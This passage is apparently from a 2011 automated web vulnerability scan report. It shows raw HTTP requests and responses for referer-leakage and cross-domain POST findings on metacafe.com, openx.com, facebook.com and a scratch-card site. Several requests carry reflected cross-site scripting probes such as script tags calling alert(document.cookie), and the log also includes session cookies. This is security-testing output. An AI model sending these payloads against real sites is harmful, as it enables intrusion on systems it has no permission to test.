Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCHnt2vgvAToHaWQiJTQ0MjIwNDc0OWQ4Mjlm%250AMmIyYzljNTBkYzMwNDJiOWE4IgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--36e9a9796c33df8a01554c7e8e74559c621ecd85; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 35019

TWTR.Widget.receiveCallback_1([{"retweet_count":0,"in_reply_to_status_id":null,"text":"Raised in the circus, perpetually homeless, and always fabulous, meet one of pop's most dynamic rising stars. http:\/\/bit.ly\/j8cAY7","created_at":"Sat May 14 20:32:18 +0000 2011","in_reply_to_screen_name":null,"in_reply_to_status_id_str":null,"contributors":null,"retweeted":false,"in_reply_to_user_id_str":null,"source":"\u003Ca href=\"http:\/\/www.tweetdeck.com\" rel=\"nofollow\"\u003ETweetDeck\u003C\/a\u003E","id_str":"69500306433642497","place":null,"coordinates":null,"geo":null,"in_reply_to_user_id":null,"truncated":false,"user":{"show_all_inline_media":false,"geo_enabled":false,"notifications":null,"created_at":"Tue Nov 23 21:57:17 +0000 2010","profile_sidebar_border_color":"C0DEED","contributors_enabled":false,"following":null,"description":"Metacafe Music is your home for music videos from your favorite artists, with a special focus on independent bands, live events, and interactive content.","profile_use_background_image":true,"profile_image_url":"http:\/\/a2.twimg.com\/profile_images\/1174206695\/Metacafe_Music_Thumb_normal.png","default_profile_image":false,"statuses_count":460,"verified":false,"profile_background_color":"C0DEED","profile_background_image_url":"http:\/\/a3.twimg.com\/images\/themes\/theme1\/bg.png","favourites_count":0,"friends_count":137,"screen_name":"metacafemusic","id_str":"219083877","default_profile":true,"follow_request_sent":null,"profile_text_color":"333333","lang":"en","profile_sidebar_fill_color":"DDEEF6","followers_count":114,"protected":false,"location":"San Francisco","profile_background_tile":false
...[SNIP]...

16.2. http://d.tradex.openx.com/afr.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://d.tradex.openx.com
Path:   /afr.php

Request 1

GET /afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/N6707/adi/meta.homepage/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=10ca289019af23418475b1d5b7b65193; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 3694
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"d6536fd1-a88d-43f5-b56c-d55966e08548",
"size":"728x90",
"floor":"0.56",
"url":"http:\/\/ad.doubleclick.net\/N6707\/adi\/meta.homepage\/adminMsg;pos=footer;sz=728x90;atf=no;name=leaderboardfooter;pageURL=www.metacafe.com%2Ffplayer%2F%3F4702d%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3Ebe96a23f3a3%3D1;studio=null;section=null;category=null;channel=null;rating=clean;hd=no;env=prod;branding=null;fbconnected=false;ffilter=true;referrer=null;LEID=40;tile=9;ord=4284276430058379",
"channel":"oxpv1:34-632-1929-1558-4408",
"hrid":"f5bd161123c6f12e4d23f8adc2f8ffa1-1305550329",
"beacon":"<div id='beacon_12a7ee2314' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=4408&amp;cb=12a7ee2314&amp;r_id=f5bd161123c6f12e4d23f8adc2f8ffa1&amp;r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->\r\n<SCRIPT TYPE=\"text\/javascript\" SRC=\"http:\/\/ad.yieldmanager.com\/st?ad_type=ad&ad_size=728x90&section=1703625\"><\/SCRIPT>\r\n<!-- END TAG --><div id='beacon_12a7ee2314' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=7833&amp;campaignid=2580&amp;zoneid=4408&amp;loc=1&amp;referer=http%3A%2F%2Fad.doubleclick.net%2FN6707%2Fadi%2Fmeta.homepage%2FadminMsg%3Bpos%3Dfooter%3Bsz%3D728x90%3Batf%3Dno%3Bname%3Dleaderboardfooter%3BpageURL%3Dwww.metacafe.com%252Ffplayer%252F%253F4702d%2522%253E%253Cscript%253Ealert%2528document.cookie%2529%253C%252Fscript%253Ebe96a23f3a3%253D1%3Bstudio%3Dnull%3Bsection%3Dnull%3Bcategory%3Dnull%3Bchannel%3Dnull%3Brating%3Dclean%3Bhd%3Dno%3Benv%3Dprod%3Bbranding%3Dnull%3Bfbconnected%3Dfalse%3Bffilter%3Dtrue%3Breferrer%3Dnull%3BLEID%3D40%3Btile%3D9%3Bord%3D4284276430058379&amp;cb=12a7ee2314&amp;r_id=f5bd161123c6f12e4d23f8adc2f8ffa1&amp;r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script
...[SNIP]...

Request 2

GET /afr.php?zoneid=4408&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:52:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=038bd2cb2b9b6198d6ef04002b0b90c5; expires=Tue, 15-May-2012 12:52:09 GMT; path=/
Content-Length: 2208
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<script type="text/javascript">
OXM_ad = {"website":"d6536fd1-a88d-43f5-b56c-d55966e08548",
"size":"728x90",
"floor":"0.56",
"channel":"oxpv1:34-632-1929-1558-4408",
"hrid":"2c6e1f58e6b85b2abc2a316f7a8773a0-1305550329",
"beacon":"<div id='beacon_a9eb8f7dba' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=1929&amp;campaignid=632&amp;zoneid=4408&amp;cb=a9eb8f7dba&amp;r_id=2c6e1f58e6b85b2abc2a316f7a8773a0&amp;r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>",
"fallback":"<!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->\r\n<SCRIPT TYPE=\"text\/javascript\" SRC=\"http:\/\/ad.yieldmanager.com\/st?ad_type=ad&ad_size=728x90&section=1703625\"><\/SCRIPT>\r\n<!-- END TAG --><div id='beacon_a9eb8f7dba' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http:\/\/d.tradex.openx.com\/lg.php?bannerid=7833&amp;campaignid=2580&amp;zoneid=4408&amp;loc=1&amp;cb=a9eb8f7dba&amp;r_id=2c6e1f58e6b85b2abc2a316f7a8773a0&amp;r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' \/><\/div>"};
</script>
<script type="text/javascript" src="http://bid.openx.net/jstag"></script>
<noscript><!-- BEGIN STANDARD TAG - 728 x 90 - ROS: Run-of-site - DO NOT MODIFY -->
<SCRIPT TYPE="text/javascript" SRC="http://ad.yieldmanager.com/st?ad_type=ad&ad_size=728x90&section=1703625"></SCRIPT>
<!-- END TAG --><div id='beacon_a9eb8f7dba' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://d.tradex.openx.com/lg.php?bannerid=7833&amp;campaignid=2580&amp;zoneid=4408&amp;loc=1&amp;cb=a9eb8f7dba&amp;r_id=2c6e1f58e6b85b2abc2a316f7a8773a0&amp;r_ts=llah2x' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div></noscript>
</body>
</html>

16.3. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Request 1

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=RTfEP; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.1.35
X-Cnection: close
Date: Mon, 16 May 2011 12:47:13 GMT
Content-Length: 35595

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<input type="hidden" name="lsd" value="RTfEP" autocomplete="off" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u003323_1"><input value="Login" tabindex="4" type="submit" id="u003323_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" autocomplete="off" id="next" name="next" value="http://www.facebook.com/PrimeScratchCards" /><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" autocomplete="off" id="lsd" name="lsd" value="RTfEP" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="toolbarContainer"><div id="pagelet_toolbar"></div></div><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet
...[SNIP]...

Request 2

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: datr=ei-eTSD3asNl9SJtmB_ThrM-

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: lsd=lucQy; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.154.43
X-Cnection: close
Date: Mon, 16 May 2011 12:47:18 GMT
Content-Length: 35306

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...
<input type="hidden" name="lsd" value="lucQy" autocomplete="off" /><input type="hidden" autocomplete="off" id="locale" name="locale" value="en_US" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Password</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm" for="u003824_1"><input value="Login" tabindex="4" type="submit" id="u003824_1" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Keep me logged in</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/recover.php" rel="nofollow">Forgot your password?</a></td></tr></table><input type="hidden" autocomplete="off" id="next" name="next" value="http://www.facebook.com/PrimeScratchCards" /><input type="hidden" name="charset_test" value="&euro;,&acute;,...,..,...,..,.." /><input type="hidden" autocomplete="off" id="lsd" name="lsd" value="lucQy" /></form>
</div></div></div></div><div class="signup_bar_container"><div class="signup_box clearfix"><a class="signup_btn uiButton uiButtonSpecial uiButtonLarge" role="button" href="/r.php?locale=en_US"><span class="uiButtonText">Sign Up</span></a><span class="signup_box_content"><span>Facebook helps you connect and share with the people in your life.</span></span></div></div><div id="dropmenu_container"></div><div id="content" class="fb_content clearfix"><div id="toolbarContainer"><div id="pagelet_toolbar"></div></div><div id="mainContainer"><div id="leftColContainer"><div id="leftCol"><div id="pagelet_left_column"></div></div></div><div id="contentCol" class="clearfix hasRightCol"><div id="headerArea"><div id="pagelet
...[SNIP]...

16.4. http://www.facebook.com/plugins/likebox.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Request 1

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.254.27
X-Cnection: close
Date: Mon, 16 May 2011 12:49:45 GMT
Content-Length: 9862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd11d6939a7e8c77242104" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">88,134</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

Request 2

GET /plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Df369d8b3f%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ff4dd62dc8%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.105.47
X-Cnection: close
Date: Mon, 16 May 2011 12:50:28 GMT
Content-Length: 9705

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd11d94ebca80a32108980" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like this.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">88,134</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem">&nbsp;&middot;&nbsp;<a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem">&nbsp;&middot;&nbsp;<a 
class="connect_widget_error_text">Error</a></span></s
...[SNIP]...

16.5. http://www.primescratchcards.com/index.asp

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.primescratchcards.com
Path:   /index.asp

Request 1

GET /index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.primescratchcards.com/index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3
Cookie: ARC=130137; pscref=; __utma=24585211.1553229019.1305549846.1305549846.1305549846.1; __utmb=24585211.1.10.1305549846; __utmc=24585211; __utmz=24585211.1305549846.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; plstat=0

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:45:42 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 30039
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=http%3A%2F%2Fwww%2Eprimescratchcards%2Ecom%2Findex%2Easp%3Fcurr%3DUSD35af5%2527%253balert%28document%2Elocation%29%2F%2Fd13433ff10e%26g%3D3; expires=Thu, 10-May-2012 12:45:42 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=OCCAMGNDCGHEBKEEJCJBDFCH; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Cards - &pound;5 Free to Scratch & Win &pound;1,000,000</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="scratch cards, scratchcards, online scratch card, online scratch games, scratchcard, scratchcards, scratch games, scratch tickets, lottery tickets, scratch, card, off, scratch off, ticket, tickets, win, games, scratch game, on line scratch, scratch off tickets, scratch off games, scratch off card, online scratch game, bingo, lottery, national lottery, make money">
<meta name="description" content="PrimeScratchCards.com, The leading online scratch cards brand, offers instant wins and prizes of up to &pound;1,000,000 per card. Join today and take the advantage of &pound;5 free to try your luck!">
<link type="text/css" rel="stylesheet" href="http://primescratchcards.com/css/screen.css" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script language="javascript">

function GameHelpPopUp(GameName) {
window.open('HelpGameGeneric.asp?PopUp=1&GameName=' + GameName, '', 'height=590,width=640,left=100,top=50,statusbar=no,toolbar=no,menubar=yes,scrollbars=yes,resizable=no');
...[SNIP]...

Request 2

GET /index.asp?curr=USD35af5%27%3balert(document.location)//d13433ff10e&g=3 HTTP/1.1
Host: www.primescratchcards.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: ARC=130137; pscref=; __utma=24585211.1553229019.1305549846.1305549846.1305549846.1; __utmb=24585211.1.10.1305549846; __utmc=24585211; __utmz=24585211.1305549846.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/16; plstat=0

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:46:02 GMT
Server: Microsoft-IIS/6.0
P3P: CP="PHY DEM UNI STA NAV COM OUR CUR ADM DEV NON COR IND DSP"
X-Powered-By: ASP.NET
Content-Length: 30039
Content-Type: text/html
Set-Cookie: ARC=130137; expires=Tue, 15-May-2012 12:46:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: pscref=; expires=Thu, 10-May-2012 12:46:02 GMT; domain=.primescratchcards.com; path=/
Set-Cookie: ASPSESSIONIDCQTRSBSQ=LHCAMGNDEBJMKLIONPMJNCGF; path=/
Cache-control: private

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Prime Scratch Cards - &pound;5 Free to Scratch & Win &pound;1,000,000</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="keywords" content="scratch cards, scratchcards, online scratch card, online scratch games, scratchcard, scratchcards, scratch games, scratch tickets, lottery tickets, scratch, card, off, scratch off, ticket, tickets, win, games, scratch game, on line scratch, scratch off tickets, scratch off games, scratch off card, online scratch game, bingo, lottery, national lottery, make money">
<meta name="description" content="PrimeScratchCards.com, The leading online scratch cards brand, offers instant wins and prizes of up to &pound;1,000,000 per card. Join today and take the advantage of &pound;5 free to try your luck!">
<link type="text/css" rel="stylesheet" href="http://primescratchcards.com/css/screen.css" />
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">


<script language="javascript">

function GameHelpPopUp(GameName) {
window.open('HelpGameGeneric.asp?PopUp=1&GameName=' + GameName, '', 'height=590,width=640,left=100,top=50,statusbar=no,toolbar=no,menubar=yes,scrollbars=yes,resizable=no');
}



   function switchLang() {
       var lang_selector = document.langFrm.lang.value;

       if (lang_selector=='?g=3')
       {
           docum
...[SNIP]...

17. Cross-domain POST
There are 2 instances of this issue:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.


17.1. http://leandrovieira.com/projects/jquery/lightbox/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leandrovieira.com
Path:   /projects/jquery/lightbox/

Issue detail

The page contains a form which POSTs data to the domain www.paypal.com. The form contains the following fields:

Request

GET /projects/jquery/lightbox/ HTTP/1.1
Host: leandrovieira.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

